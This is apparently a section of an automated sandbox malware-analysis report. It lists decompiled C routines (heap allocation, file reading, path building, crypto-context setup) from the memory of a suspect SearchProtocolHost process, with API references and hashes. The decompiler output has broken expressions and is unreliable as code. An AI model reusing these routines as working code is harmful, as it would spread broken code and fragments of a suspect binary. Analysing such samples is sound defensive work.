                                                0x02fb000f
                                                0x02fb0015
                                                0x02fb001b
                                                0x02fb0028
                                                0x02faffea
                                                0x02faffed
                                                0x02fafff7
                                                0x02fb0004
                                                0x02fb0004

                                                APIs
                                                • new.LIBCMT ref: 02FAFF9C
                                                  • Part of subcall function 02FAF3D0: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,02FAFFE1,?,?,00000244,93AD1EEA,?,?,?,93AD1EEA,02FC47B2), ref: 02FAF3F7
                                                • new.LIBCMT ref: 02FB0007
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID:
                                                • API String ID: 1611563598-0
                                                • Opcode ID: 928349ecd67a06653e6f2464e6509988faff85068aab747dcbbba5254ed062be
                                                • Instruction ID: e57ea509fd4e7bd22619b44e878733213d2fb05b78932e8ceded46629392369d
                                                • Opcode Fuzzy Hash: 928349ecd67a06653e6f2464e6509988faff85068aab747dcbbba5254ed062be
                                                • Instruction Fuzzy Hash: 8F11CEB2A04605AFD314DF19DC05B9AFBE9FB45B70F00432EE829877C0EBB564008B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FB7848 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E02FB7848(void* _a4) {
				char _t3;
				intOrPtr* _t4;
				intOrPtr _t6;

				if(_a4 != 0) {
					_t3 = RtlFreeHeap( *0x2fd67f4, 0, _a4); // executed
					if(_t3 == 0) {
						_t4 = E02FB5D43();
						_t6 = E02FB5CCA(GetLastError());
						 *_t4 = _t6;
						return _t6;
					}
				}
				return _t3;
			}






                                                0x02fb7851
                                                0x02fb785e
                                                0x02fb7866
                                                0x02fb7869
                                                0x02fb7877
                                                0x02fb787d
                                                0x00000000
                                                0x02fb787f
                                                0x02fb7866
                                                0x02fb7881

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,02FBC333,?,00000000,?,00000000,?,02FBC35A,?,00000007,?,?,02FBC757,?), ref: 02FB785E
                                                • GetLastError.KERNEL32(?,?,02FBC333,?,00000000,?,00000000,?,02FBC35A,?,00000007,?,?,02FBC757,?,?), ref: 02FB7870
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 485612231-0
                                                • Opcode ID: 3895e1706e40475feea44b24d7347c87b723c65367305b7ea5f3d2cd1ca97497
                                                • Instruction ID: dedb02bc0b2d0ea04e0c1984989f93b9c9194ae898591b5767b140647d51479f
                                                • Opcode Fuzzy Hash: 3895e1706e40475feea44b24d7347c87b723c65367305b7ea5f3d2cd1ca97497
                                                • Instruction Fuzzy Hash: 8FE08632944209A7CB162FB5AD0CFD9BB99AF407D1F600524F74CD6150DB349490CBC4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA48B0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E02FA48B0(intOrPtr* __ecx) {
				void* _t8;
				void* _t11;
				void* _t18;
				intOrPtr* _t19;

				_t19 = __ecx;
				_t15 =  *((intOrPtr*)( *__ecx + 0xc)) + 0x50;
				_t8 = LocalAlloc(0x40,  *((intOrPtr*)( *__ecx + 0xc)) + 0x50); // executed
				_t20 =  *_t19;
				_t18 = _t8;
				asm("movups xmm0, [esi]");
				_t2 = _t18 + 0x50; // 0x50
				asm("movups [edi], xmm0");
				asm("movups xmm0, [esi+0x10]");
				asm("movups [edi+0x10], xmm0");
				asm("movups xmm0, [esi+0x20]");
				asm("movups [edi+0x20], xmm0");
				asm("movups xmm0, [esi+0x30]");
				asm("movups [edi+0x30], xmm0");
				asm("movups xmm0, [esi+0x40]");
				asm("movups [edi+0x40], xmm0");
				E02FC3DB0(_t2,  *((intOrPtr*)( *_t19 + 0x50)),  *((intOrPtr*)( *_t19 + 0xc)));
				_t11 = E02FA4920(_t18, _t15,  *((intOrPtr*)(_t20 + 0x54)),  *((intOrPtr*)(_t20 + 0x38))); // executed
				LocalFree(_t18); // executed
				return _t11;
			}







                                                0x02fa48b2
                                                0x02fa48ba
                                                0x02fa48c0
                                                0x02fa48c6
                                                0x02fa48c8
                                                0x02fa48ca
                                                0x02fa48cd
                                                0x02fa48d0
                                                0x02fa48d3
                                                0x02fa48d7
                                                0x02fa48db
                                                0x02fa48df
                                                0x02fa48e3
                                                0x02fa48e7
                                                0x02fa48eb
                                                0x02fa48ef
                                                0x02fa48fa
                                                0x02fa4907
                                                0x02fa4912
                                                0x02fa491d

                                                APIs
                                                • LocalAlloc.KERNELBASE(00000040,?,?,00000000,-00000050,02FA4BCD), ref: 02FA48C0
                                                  • Part of subcall function 02FA4920: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?), ref: 02FA4935
                                                • LocalFree.KERNELBASE(00000000), ref: 02FA4912
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Local$AcquireAllocContextCryptFree
                                                • String ID:
                                                • API String ID: 3426805970-0
                                                • Opcode ID: d2ce4c880d94a2b75c7db499564d3537e3ed479937a2fd29b1a8c737d3269b25
                                                • Instruction ID: 8e2cbd0f9bca88a95f6b31ea09d2c12f456350448e6293ea8beb14072e1fe3ce
                                                • Opcode Fuzzy Hash: d2ce4c880d94a2b75c7db499564d3537e3ed479937a2fd29b1a8c737d3269b25
                                                • Instruction Fuzzy Hash: 8F015271D04B45ABE3114F38CE419F2F3B4FF6D318704AB09EAC562912E761B5E48750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAE280 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E02FAE280(char* __ecx, long __edx) {
				void _v5;
				long _v12;
				signed int _t22;
				signed int* _t28;
				intOrPtr _t29;
				intOrPtr _t31;
				char* _t35;

				_t35 = __ecx;
				_t28 = __edx;
				_v12 = __edx;
				_t33 = 1;
				if( *__ecx == 0) {
					_t29 =  *((intOrPtr*)(__ecx + 0x1c));
					_t31 =  *((intOrPtr*)(__ecx + 0x18));
					if(_t29 + 1 > _t31) {
						_t33 = _t31 - _t29;
					}
					E02FC3DB0( &_v5,  *((intOrPtr*)(_t35 + 0x14)) + _t29, _t33);
					_t22 = _t29 + _t33;
					_t28 = _v12;
					 *(_t35 + 0x1c) = _t22;
				} else {
					_t22 = ReadFile( *(__ecx + 4),  &_v5, 1,  &_v12, 0); // executed
					if(_t22 == 0) {
						 *((char*)(_t35 + 8)) = 1;
					}
					_t33 = _v12;
				}
				if(_t33 != 1) {
					if( *_t35 == 0 ||  *((char*)(_t35 + 8)) == 0) {
						goto L9;
					} else {
						return _t22 | 0xffffffff;
					}
				} else {
					 *_t28 = _v5 & 0x000000ff;
					L9:
					return 0;
				}
			}










                                                0x02fae288
                                                0x02fae28a
                                                0x02fae28d
                                                0x02fae290
                                                0x02fae298
                                                0x02fae2bb
                                                0x02fae2be
                                                0x02fae2c6
                                                0x02fae2ca
                                                0x02fae2ca
                                                0x02fae2d7
                                                0x02fae2dc
                                                0x02fae2e2
                                                0x02fae2e5
                                                0x02fae29a
                                                0x02fae2a8
                                                0x02fae2b0
                                                0x02fae2b2
                                                0x02fae2b2
                                                0x02fae2b6
                                                0x02fae2b6
                                                0x02fae2eb
                                                0x02fae2ff
                                                0x00000000
                                                0x02fae309
                                                0x02fae310
                                                0x02fae310
                                                0x02fae2ed
                                                0x02fae2f1
                                                0x02fae2f5
                                                0x02fae2fb
                                                0x02fae2fb

                                                APIs
                                                • ReadFile.KERNELBASE(?,?,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000001,?,?,02FAE59A,00000001), ref: 02FAE2A8
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: d8e93ffa0367f87b9ec6911a8d1b1a84657acf16b49f69b3001d0fa17a94e1b3
                                                • Instruction ID: e7237501b95e64bb97789178f6f98911ba3eb75c71a5e156d80691588d671518
                                                • Opcode Fuzzy Hash: d8e93ffa0367f87b9ec6911a8d1b1a84657acf16b49f69b3001d0fa17a94e1b3
                                                • Instruction Fuzzy Hash: DB11C8B1E042086FDB30CE99D884BE9BBFCEB85314F1405BED985C7241D771A948C760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAF3D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E02FAF3D0(intOrPtr* __ecx, void* __edi, CHAR* _a4) {
				char _v8;
				char _t13;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				short _t21;
				CHAR* _t23;
				char* _t29;
				CHAR* _t32;
				short* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t36 = __ecx;
				if( *__ecx != 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
					return 0x1000000;
				} else {
					_t2 = _t36 + 0x140; // 0x140
					_t32 = _t2;
					GetCurrentDirectoryA(0x104, _t32);
					_t23 = _t32;
					_t3 =  &(_t23[1]); // 0x141
					_t29 = _t3;
					do {
						_t13 =  *_t23;
						_t23 =  &(_t23[1]);
					} while (_t13 != 0);
					_t24 = _t23 - _t29;
					_t14 =  *((intOrPtr*)(_t23 - _t29 + _t36 + 0x13f));
					if(_t14 != 0x5c && _t14 != 0x2f) {
						_t34 = _t32 - 1;
						do {
							_t20 =  *((intOrPtr*)(_t34 + 1));
							_t34 = _t34 + 1;
						} while (_t20 != 0);
						_t21 = "\\"; // 0x5c
						 *_t34 = _t21;
					}
					_t16 = E02FAE0D0(_a4, _t24,  &_v8); // executed
					if(_t16 != 0) {
						_t17 = E02FAE550(_t16); // executed
						 *_t36 = _t17;
						_t28 =  ==  ? 0x200 : 0;
						_t18 =  ==  ? 0x200 : 0;
						return  ==  ? 0x200 : 0;
					} else {
						return _v8;
					}
				}
			}















                                                0x02faf3d3
                                                0x02faf3d5
                                                0x02faf3da
                                                0x02faf479
                                                0x02faf3ea
                                                0x02faf3eb
                                                0x02faf3eb
                                                0x02faf3f7
                                                0x02faf3fd
                                                0x02faf3ff
                                                0x02faf3ff
                                                0x02faf402
                                                0x02faf402
                                                0x02faf404
                                                0x02faf405
                                                0x02faf409
                                                0x02faf40b
                                                0x02faf414
                                                0x02faf41a
                                                0x02faf420
                                                0x02faf420
                                                0x02faf423
                                                0x02faf426
                                                0x02faf42a
                                                0x02faf430
                                                0x02faf430
                                                0x02faf43b
                                                0x02faf446
                                                0x02faf454
                                                0x02faf45b
                                                0x02faf465
                                                0x02faf468
                                                0x02faf46d
                                                0x02faf448
                                                0x02faf44f
                                                0x02faf44f
                                                0x02faf446

                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,02FAFFE1,?,?,00000244,93AD1EEA,?,?,?,93AD1EEA,02FC47B2), ref: 02FAF3F7
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID:
                                                • API String ID: 1611563598-0
                                                • Opcode ID: 2656503481292f3d328fae8e26a7654c258b7c81c4504f45c35934ae7fe727bb
                                                • Instruction ID: 67ebdff139e7bc36b0e0a8263bc5b62a4a82b82a8101910f4d17d93f67e83340
                                                • Opcode Fuzzy Hash: 2656503481292f3d328fae8e26a7654c258b7c81c4504f45c35934ae7fe727bb
                                                • Instruction Fuzzy Hash: 2E11EB759042059BCB248F2CE920BF5B7A9EB89354F10476EED99CBA40E73359538790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAE200 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E02FAE200(void* __ecx, signed int __edx, long _a4, char* _a8) {
				void* _v8;
				int _t26;
				signed int _t30;
				intOrPtr _t34;
				intOrPtr _t39;
				char* _t45;
				long _t50;

				_push(__ecx);
				_t45 = _a8;
				_t30 = __edx;
				_t50 = __edx * _a4;
				_v8 = __ecx;
				if( *_t45 == 0) {
					_t39 =  *((intOrPtr*)(_t45 + 0x1c));
					_t34 =  *((intOrPtr*)(_t45 + 0x18));
					if(_t39 + _t50 > _t34) {
						_t50 = _t34 - _t39;
					}
					E02FC3DB0(_v8,  *((intOrPtr*)(_t45 + 0x14)) + _t39, _t50);
					 *((intOrPtr*)(_t45 + 0x1c)) =  *((intOrPtr*)(_t45 + 0x1c)) + _t50;
					return _t50 / _t30;
				} else {
					_t26 = ReadFile( *(_t45 + 4), __ecx, _t50,  &_a4, 0); // executed
					if(_t26 == 0) {
						 *((char*)(_t45 + 8)) = 1;
					}
					return _a4 / _t30;
				}
			}










                                                0x02fae203
                                                0x02fae207
                                                0x02fae20a
                                                0x02fae210
                                                0x02fae214
                                                0x02fae21a
                                                0x02fae243
                                                0x02fae246
                                                0x02fae24e
                                                0x02fae252
                                                0x02fae252
                                                0x02fae25e
                                                0x02fae263
                                                0x02fae275
                                                0x02fae21c
                                                0x02fae227
                                                0x02fae22f
                                                0x02fae231
                                                0x02fae231
                                                0x02fae242
                                                0x02fae242

                                                APIs
                                                • ReadFile.KERNELBASE(000000FF,00000078,?,?,00000000,00000000,00000000,00000000,00000078,?,02FAEC00,00000001,00000000), ref: 02FAE227
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 82d2c2cfb5cc41f37618292f7e7e8aba5ed3865caa0d0ad26adb1c78b1e61b9e
                                                • Instruction ID: a577406cadb2ebffe158aec78b674afa1a0542399ffe8d83b65db95b44e86c15
                                                • Opcode Fuzzy Hash: 82d2c2cfb5cc41f37618292f7e7e8aba5ed3865caa0d0ad26adb1c78b1e61b9e
                                                • Instruction Fuzzy Hash: 42018871B001197FD714CE5ADC45AA5F7A9FF85354F54826AE90C87200E771AD54CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FB78D0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E02FB78D0(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x2fd67f4, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E02FB7501();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E02FB5D43())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E02FB6248(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}









                                                0x02fb78d0
                                                0x02fb78d6
                                                0x02fb78db
                                                0x02fb78e9
                                                0x02fb78e9
                                                0x02fb78ef
                                                0x02fb78f1
                                                0x02fb78f1
                                                0x02fb7908
                                                0x02fb7911
                                                0x02fb7919
                                                0x00000000
                                                0x00000000
                                                0x02fb78f9
                                                0x02fb78fb
                                                0x02fb791d
                                                0x02fb7922
                                                0x02fb7928
                                                0x00000000
                                                0x02fb7928
                                                0x02fb78fe
                                                0x02fb7903
                                                0x02fb7904
                                                0x02fb7906
                                                0x00000000
                                                0x00000000
                                                0x02fb7906
                                                0x00000000
                                                0x02fb7908
                                                0x02fb78e1
                                                0x02fb78e7
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,02FB91AD,00000001,00000364,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB7911
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: c26e6f0d0c63695aaee695717e9d2786f43629284154e9f920623ab5426a4f4a
                                                • Instruction ID: e72d900e41863fb747365ed6648a0db590dbd4dc6366e7e10da36cb42dd45bb4
                                                • Opcode Fuzzy Hash: c26e6f0d0c63695aaee695717e9d2786f43629284154e9f920623ab5426a4f4a
                                                • Instruction Fuzzy Hash: D0F0B433E4512967DB233A279D14FDAF749AFC8BF4B144521EE09EA180CB20E910CAE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FB7882 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E02FB7882(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E02FB5D43())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x2fd67f4, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E02FB7501();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E02FB6248(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                                                0x02fb7882
                                                0x02fb7888
                                                0x02fb788e
                                                0x02fb78c0
                                                0x02fb78c5
                                                0x02fb78cb
                                                0x00000000
                                                0x02fb78cb
                                                0x02fb7892
                                                0x02fb7894
                                                0x02fb7894
                                                0x02fb78ab
                                                0x02fb78b4
                                                0x02fb78bc
                                                0x00000000
                                                0x00000000
                                                0x02fb789c
                                                0x02fb789e
                                                0x00000000
                                                0x00000000
                                                0x02fb78a1
                                                0x02fb78a6
                                                0x02fb78a7
                                                0x02fb78a9
                                                0x00000000
                                                0x00000000
                                                0x02fb78a9
                                                0x00000000

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB78B4
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 39296fdab6158eed2ef30f3641effeb62865dd5cbfe9d0ee5726929e7ca031d9
                                                • Instruction ID: a08fbcdd4fc977f07a7ba6e8871192d7617ed5dc8c515d9d0af1f42297316e18
                                                • Opcode Fuzzy Hash: 39296fdab6158eed2ef30f3641effeb62865dd5cbfe9d0ee5726929e7ca031d9
                                                • Instruction Fuzzy Hash: 9FE03933A8522966EE2336779C04FEAFB5A9F816E0F650220EF05E6590DB60E800C5E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAE550 Relevance: 1.4, APIs: 1, Instructions: 199COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E02FAE550(char* __ecx) {
				intOrPtr _v8;
				char _v96;
				char _v100;
				intOrPtr _v104;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				void _v132;
				long _v136;
				void* _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				long _t58;
				void* _t59;
				char _t61;
				char _t62;
				char _t63;
				void* _t67;
				void* _t68;
				char _t70;
				intOrPtr _t76;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				signed int _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t101;
				char _t112;
				intOrPtr _t136;
				void _t146;
				char _t157;
				void* _t158;
				intOrPtr _t160;

				_push(_t87);
				_t146 = __ecx;
				_t170 = __ecx;
				if(__ecx == 0) {
					L31:
					__eflags = 0;
					return 0;
				} else {
					_t58 = E02FAE3C0(__ecx, _t170); // executed
					_t89 = _t87 | 0xffffffff;
					_v136 = _t58;
					_t155 =  ==  ? _t89 : 0; // executed
					_t59 = E02FAE170(__ecx, _t58, 0); // executed
					_t156 =  !=  ? _t89 :  ==  ? _t89 : 0; // executed
					E02FAE320(__ecx,  &_v140, _t59); // executed
					_t157 =  !=  ? _t89 :  !=  ? _t89 :  ==  ? _t89 : 0;
					_t61 = E02FAE280(__ecx,  &_v152);
					_v144 = _v152;
					if(_t61 != 0) {
						L4:
						__eflags = _t61;
						_v144 = 0;
						_t157 =  !=  ? _t89 : _t157;
						__eflags = _t157;
					} else {
						_t61 = E02FAE280(__ecx,  &_v152);
						if(_t61 != 0) {
							goto L4;
						} else {
							_t101 = _v152 << 8;
							_v144 = _v144 + _t101;
							_t89 = _t101 | 0xffffffff;
						}
					}
					_t62 = E02FAE280(_t146,  &_v152);
					_v148 = _v152;
					if(_t62 != 0) {
						L8:
						__eflags = _t62;
						_v148 = 0;
						_t157 =  !=  ? _t89 : _t157;
						__eflags = _t157;
					} else {
						_t62 = E02FAE280(_t146,  &_v152);
						if(_t62 != 0) {
							goto L8;
						} else {
							_v148 = _v148 + (_v152 << 8);
						}
					}
					_t63 = E02FAE280(_t146,  &_v152);
					_v140 = _v152;
					if(_t63 != 0) {
						L12:
						_t90 = 0;
						__eflags = _t63;
						_t157 =  !=  ? 0xffffffff : _t157;
					} else {
						_t63 = E02FAE280(_t146,  &_v152);
						if(_t63 != 0) {
							goto L12;
						} else {
							_t90 = (_v152 << 8) + _v140;
						}
					}
					_v128 = _t90;
					_t112 = E02FAE280(_t146,  &_v152);
					_v140 = _v152;
					if(_t112 != 0) {
						L16:
						_t67 = 0;
						__eflags = _t112;
						_t158 =  !=  ? 0xffffffff : _t157;
					} else {
						_t112 = E02FAE280(_t146,  &_v152);
						if(_t112 != 0) {
							goto L16;
						} else {
							_t67 = (_v152 << 8) + _v140;
						}
					}
					if(_t67 != _t90 || _v148 != 0) {
						L20:
						_t158 = 0xffffff99;
					} else {
						_t184 = _v144;
						if(_v144 != 0) {
							goto L20;
						}
					}
					_t68 = E02FAE320(_t146,  &_v100, _t184);
					_t159 =  !=  ? 0xffffffff : _t158;
					E02FAE320(_t146,  &_v96, _t68);
					_t160 =  !=  ? 0xffffffff :  !=  ? 0xffffffff : _t158;
					_t70 = E02FAE280(_t146,  &_v152);
					_t92 = _v152;
					if(_t70 != 0) {
						L24:
						__eflags = _t70;
						_v124 = 0;
						_t160 =  !=  ? 0xffffffff : _t160;
					} else {
						_t70 = E02FAE280(_t146,  &_v152);
						if(_t70 != 0) {
							goto L24;
						} else {
							_v124 = (_v152 << 8) + _t92;
						}
					}
					_t136 =  *((intOrPtr*)(_t146 + 0xc));
					_t118 = _v136 + _t136;
					_t93 = _v100;
					if(_v136 + _t136 < _v96 + _t93 || _t160 != 0) {
						__eflags =  *((char*)(_t146 + 0x10));
						if( *((char*)(_t146 + 0x10)) != 0) {
							CloseHandle( *(_t146 + 4));
						}
						_push(0x20);
						E02FB0AA1(_t146);
						goto L31;
					} else {
						_t76 = _v136;
						_v132 = _t146;
						_push(0x80);
						_v120 = _t136 - _t93 - _v96 + _t76;
						_v104 = _t76;
						_v8 = _t160;
						 *((intOrPtr*)(_t146 + 0xc)) = _t160;
						_t94 = E02FB5A3B(_t118);
						memcpy(_t94,  &_v132, 0x20 << 2);
						E02FAEC60(_t94);
						return _t94;
					}
				}
			}






































                                                0x02fae55c
                                                0x02fae55f
                                                0x02fae561
                                                0x02fae563
                                                0x02fae7aa
                                                0x02fae7ac
                                                0x02fae7b2
                                                0x02fae569
                                                0x02fae56b
                                                0x02fae570
                                                0x02fae573
                                                0x02fae57f
                                                0x02fae582
                                                0x02fae592
                                                0x02fae595
                                                0x02fae5a2
                                                0x02fae5a5
                                                0x02fae5ae
                                                0x02fae5b4
                                                0x02fae5d5
                                                0x02fae5d5
                                                0x02fae5d7
                                                0x02fae5df
                                                0x02fae5df
                                                0x02fae5b6
                                                0x02fae5bc
                                                0x02fae5c3
                                                0x00000000
                                                0x02fae5c5
                                                0x02fae5c9
                                                0x02fae5cc
                                                0x02fae5d0
                                                0x02fae5d0
                                                0x02fae5c3
                                                0x02fae5e8
                                                0x02fae5f1
                                                0x02fae5f7
                                                0x02fae615
                                                0x02fae615
                                                0x02fae617
                                                0x02fae61f
                                                0x02fae61f
                                                0x02fae5f9
                                                0x02fae5ff
                                                0x02fae606
                                                0x00000000
                                                0x02fae608
                                                0x02fae60f
                                                0x02fae60f
                                                0x02fae606
                                                0x02fae628
                                                0x02fae631
                                                0x02fae637
                                                0x02fae655
                                                0x02fae655
                                                0x02fae657
                                                0x02fae65e
                                                0x02fae639
                                                0x02fae63f
                                                0x02fae646
                                                0x00000000
                                                0x02fae648
                                                0x02fae64f
                                                0x02fae64f
                                                0x02fae646
                                                0x02fae665
                                                0x02fae670
                                                0x02fae676
                                                0x02fae67c
                                                0x02fae69c
                                                0x02fae69c
                                                0x02fae69e
                                                0x02fae6a5
                                                0x02fae67e
                                                0x02fae689
                                                0x02fae68d
                                                0x00000000
                                                0x02fae68f
                                                0x02fae696
                                                0x02fae696
                                                0x02fae68d
                                                0x02fae6aa
                                                0x02fae6ba
                                                0x02fae6ba
                                                0x02fae6b3
                                                0x02fae6b3
                                                0x02fae6b8
                                                0x00000000
                                                0x00000000
                                                0x02fae6b8
                                                0x02fae6c5
                                                0x02fae6d7
                                                0x02fae6da
                                                0x02fae6e7
                                                0x02fae6ea
                                                0x02fae6ef
                                                0x02fae6f5
                                                0x02fae715
                                                0x02fae715
                                                0x02fae717
                                                0x02fae724
                                                0x02fae6f7
                                                0x02fae6fd
                                                0x02fae704
                                                0x00000000
                                                0x02fae706
                                                0x02fae70f
                                                0x02fae70f
                                                0x02fae704
                                                0x02fae72f
                                                0x02fae732
                                                0x02fae734
                                                0x02fae73c
                                                0x02fae790
                                                0x02fae794
                                                0x02fae799
                                                0x02fae799
                                                0x02fae79f
                                                0x02fae7a2
                                                0x00000000
                                                0x02fae742
                                                0x02fae742
                                                0x02fae74e
                                                0x02fae752
                                                0x02fae757
                                                0x02fae75b
                                                0x02fae75f
                                                0x02fae766
                                                0x02fae76e
                                                0x02fae77e
                                                0x02fae782
                                                0x02fae78f
                                                0x02fae78f
                                                0x02fae73c

                                                APIs
                                                  • Part of subcall function 02FAE170: SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,02FAE3D2,00000002,00000001,?,?,?,02FAE570,?,00000000,00000001), ref: 02FAE190
                                                  • Part of subcall function 02FAE280: ReadFile.KERNELBASE(?,?,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000001,?,?,02FAE59A,00000001), ref: 02FAE2A8
                                                • CloseHandle.KERNEL32(?), ref: 02FAE799
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$CloseHandlePointerRead
                                                • String ID:
                                                • API String ID: 3130900363-0
                                                • Opcode ID: eb95aae66116ad16ede7b15707c62f57b2925ad2f68a833786316af71c0b7059
                                                • Instruction ID: 69d0ac74f890486196a3a1fdb680658ae35641e90455416b922fc80b9b340a4f
                                                • Opcode Fuzzy Hash: eb95aae66116ad16ede7b15707c62f57b2925ad2f68a833786316af71c0b7059
                                                • Instruction Fuzzy Hash: 4461F0B5B043019FD755DE29CCA066EB7D2AFC43A4F048E3DEA6587381EB74D9058B82
                                                Uniqueness

